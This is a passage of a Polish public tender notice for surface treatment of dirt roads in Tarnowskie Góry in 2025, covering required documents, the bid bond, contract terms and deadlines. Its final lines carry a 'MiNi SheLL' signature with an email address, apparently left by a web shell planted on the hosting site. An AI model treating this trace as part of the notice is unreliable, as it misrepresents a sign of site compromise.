nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Okres, o którym wyżej mowa liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>-	w celu wykazania spełniania warunku<br/>wykaz osób (załącznik numer 4 do SWZ), skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacje o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/> Formularz oferty zgodnie z Załącznikiem nr 1a do SWZ.<br/>- Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy do złożenia oferty, o<br/> ile ofertę składa pełnomocnik;<br/>- Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania dla pełnomocnika do<br/> reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie<br/> zamówienia;<br/>- Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania – wzór oświadczenia o niepodleganiu wykluczeniu<br/> stanowi Załącznik do SWZ w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci<br/> elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. W przypadku wspólnego ubiegania się <br/>o zamówienie przez Wykonawców, oświadczenie o niepoleganiu wykluczeniu składa każdy <br/>z Wykonawców. W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, Wykonawca<br/> przedstawia także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego<br/> podmiotu.<br/>- Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – wzór oświadczenia o spełnianiu warunków<br/> stanowi Załącznik do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie<br/> składa każdy z Wykonawców w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/> postępowaniu. W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, Wykonawca<br/> przedstawia także oświadczenie podmiotu udostępniającego zasoby, potwierdzające spełnianie warunków udziału w<br/> postępowaniu lub kryteriów selekcji, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/> UWAGA: Oświadczenie o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału <br/>w postępowaniu musi być złożone w formie elektronicznej opatrzone kwalifikowanym podpisem elektronicznym lub w<br/> postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/> - Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia w przypadku, o którym mowa w art. 117 ust. 4 ustawy p.z.p., z którego wynika, które roboty budowlane, dostawy lub usługi<br/> wykonają poszczególni Wykonawcy (wzór oświadczenia stanowi Załącznik do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia wadium:<br/>5 000,00 zł (słownie: pięć tysięcy złotych i 00/100) <br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2. <br/>2.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach: <br/>a)	pieniądzu; <br/>b)	gwarancjach bankowych; <br/>c)	gwarancjach ubezpieczeniowych; <br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia <br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2025 r. poz. 98). <br/>3.	Wadium wnoszone w pieniądzu należy wpłacać przelewem na następujący rachunek bankowy:<br/><br/>Bank Millenium S.A.: 64 1160 2202 0000 0006 3523 8102<br/> <br/>z dopiskiem:<br/>„Powierzchniowe utrwalenie dróg gruntowych na terenie Gminy Tarnowskie Góry w 2025r”, postępowanie numer: MZUiM.263.7.2025.TP2.RB <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania dla pełnomocnika do reprezentowania<br/> w postępowaniu Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie<br/> zamówienia;<br/> UWAGA: Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w<br/> formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub postaci elektronicznej opatrzonej podpisem<br/> zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa<br/> sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97<br/> § 2 ustawy z dnia 14 lutego 1991 r. Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem<br/> elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej,<br/> kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa<br/> nie może być uwierzytelniona przez upełnomocnionego.<br/> Przed podpisaniem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w przypadku wyboru ich oferty<br/> jako najkorzystniejszej) przedstawią Zamawiającemu umowę regulującą współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określone zostały w załączniku nr 2 do SWZ to jest – wzór umowy.<br/> 2. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw. zmiany kontraktowe w oparciu o art. 455<br/> ust. 1 pkt. 1 ustawy P.z.p.) w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z<br/> warunkami zawartymi w załączniku nr 2 do SWZ.<br/> 3. Zmiana umowy może także nastąpić w przypadkach, o których mowa w art. 455 ust. 1 pkt. 2 - 4 oraz ust. 2 ustawy P.z.p. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mzuimtg.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-07 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com